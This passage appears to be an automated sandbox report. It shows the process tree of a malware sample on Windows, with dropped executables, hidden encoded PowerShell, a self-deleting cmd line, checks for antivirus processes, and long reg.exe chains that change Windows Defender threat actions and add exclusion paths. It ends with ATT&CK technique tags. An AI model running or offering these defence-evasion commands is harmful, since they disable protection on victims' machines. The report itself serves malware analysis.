                                                              PID:1020
                                                          • C:\Users\Admin\Documents\V66OHaobaQ5dLbKycuxKWMSO.exe
                                                            "C:\Users\Admin\Documents\V66OHaobaQ5dLbKycuxKWMSO.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Checks processor information in registry
                                                            PID:1840
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                              3⤵
                                                              • Blocklisted process makes network request
                                                              PID:2460
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 936
                                                              3⤵
                                                              • Program crash
                                                              PID:2488
                                                          • C:\Users\Admin\Documents\be0HaSBBXMw1rnFBRlj0eVso.exe
                                                            "C:\Users\Admin\Documents\be0HaSBBXMw1rnFBRlj0eVso.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:2484
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\be0HaSBBXMw1rnFBRlj0eVso.exe
                                                              3⤵
                                                                PID:4636
                                                                • C:\Windows\system32\choice.exe
                                                                  choice /C Y /N /D Y /T 0
                                                                  4⤵
                                                                    PID:312
                                                              • C:\Users\Admin\Documents\SZUiGXP7FFh5pdJ16Xlxt4C1.exe
                                                                "C:\Users\Admin\Documents\SZUiGXP7FFh5pdJ16Xlxt4C1.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Checks computer location settings
                                                                PID:4220
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS44420A5D\sahiba_2.exe
                                                              sahiba_2.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:2160
                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2096
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                2⤵
                                                                • Loads dropped DLL
                                                                PID:4368
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 600
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:180
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4368 -ip 4368
                                                              1⤵
                                                                PID:4256
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1688 -ip 1688
                                                                1⤵
                                                                  PID:5032
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1828 -ip 1828
                                                                  1⤵
                                                                    PID:4868
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4944 -ip 4944
                                                                    1⤵
                                                                      PID:3032
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                      1⤵
                                                                        PID:4684
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd
                                                                          2⤵
                                                                            PID:2332
                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                              tasklist /FI "imagename eq BullGuardCore.exe"
                                                                              3⤵
                                                                              • Enumerates processes with tasklist
                                                                              PID:2744
                                                                            • C:\Windows\SysWOW64\find.exe
                                                                              find /I /N "bullguardcore.exe"
                                                                              3⤵
                                                                                PID:4572
                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                tasklist /FI "imagename eq PSUAService.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                • Enumerates processes with tasklist
                                                                                PID:1960
                                                                              • C:\Windows\SysWOW64\find.exe
                                                                                find /I /N "psuaservice.exe"
                                                                                3⤵
                                                                                  PID:1536
                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                  findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                                  3⤵
                                                                                    PID:4648
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                                    Accostarmi.exe.pif N
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:2088
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4196
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 12
                                                                                        5⤵
                                                                                        • Program crash
                                                                                        PID:2500
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4332 -ip 4332
                                                                                1⤵
                                                                                  PID:1472
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4944 -ip 4944
                                                                                  1⤵
                                                                                    PID:792
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4332 -ip 4332
                                                                                    1⤵
                                                                                      PID:2492
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2260 -ip 2260
                                                                                      1⤵
                                                                                        PID:3180
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2096 -ip 2096
                                                                                        1⤵
                                                                                          PID:3484
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4944 -ip 4944
                                                                                          1⤵
                                                                                            PID:5108
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4944 -ip 4944
                                                                                            1⤵
                                                                                              PID:180
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4748 -ip 4748
                                                                                              1⤵
                                                                                                PID:3484
                                                                                              • C:\Windows\SysWOW64\hvhtovyy\lgvrlnlg.exe
                                                                                                C:\Windows\SysWOW64\hvhtovyy\lgvrlnlg.exe /d"C:\Users\Admin\Documents\t8gkAd4lidOE2Kc8wQw0HCr_.exe"
                                                                                                1⤵
                                                                                                  PID:1960
                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                    svchost.exe
                                                                                                    2⤵
                                                                                                      PID:4804
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                    1⤵
                                                                                                      PID:4300
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4944 -ip 4944
                                                                                                      1⤵
                                                                                                        PID:4044
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4944 -ip 4944
                                                                                                        1⤵
                                                                                                          PID:3972
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4944 -ip 4944
                                                                                                          1⤵
                                                                                                            PID:3448
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4944 -ip 4944
                                                                                                            1⤵
                                                                                                              PID:2424
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4944 -ip 4944
                                                                                                              1⤵
                                                                                                                PID:2008
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                1⤵
                                                                                                                  PID:2616
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    2⤵
                                                                                                                      PID:4980
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1840 -ip 1840
                                                                                                                    1⤵
                                                                                                                      PID:3300
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:2756
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                        1⤵
                                                                                                                          PID:1468
                                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                          1⤵
                                                                                                                            PID:3668
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4196 -ip 4196
                                                                                                                            1⤵
                                                                                                                              PID:2612
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\vfLjJHM.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\vfLjJHM.exe j6 /site_id 525403 /S
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1368
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                2⤵
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:1364
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:4360
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:3688
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:1140
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:1104
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:3672
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:4212
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:948
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:4352
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2516
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2508
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3408
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5016
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5076
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2408
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:852
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4716
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:208
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4964
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4012
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1272
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:972
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:444
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2216
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:2100
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3816
                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  PID:2160
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1780
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:2524
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3988
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:856
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5044
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:3196

                                                                                                                                                                                          Network

                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                          Execution

                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                          1
                                                                                                                                                                                          T1053

                                                                                                                                                                                          Persistence

                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                          2
                                                                                                                                                                                          T1031

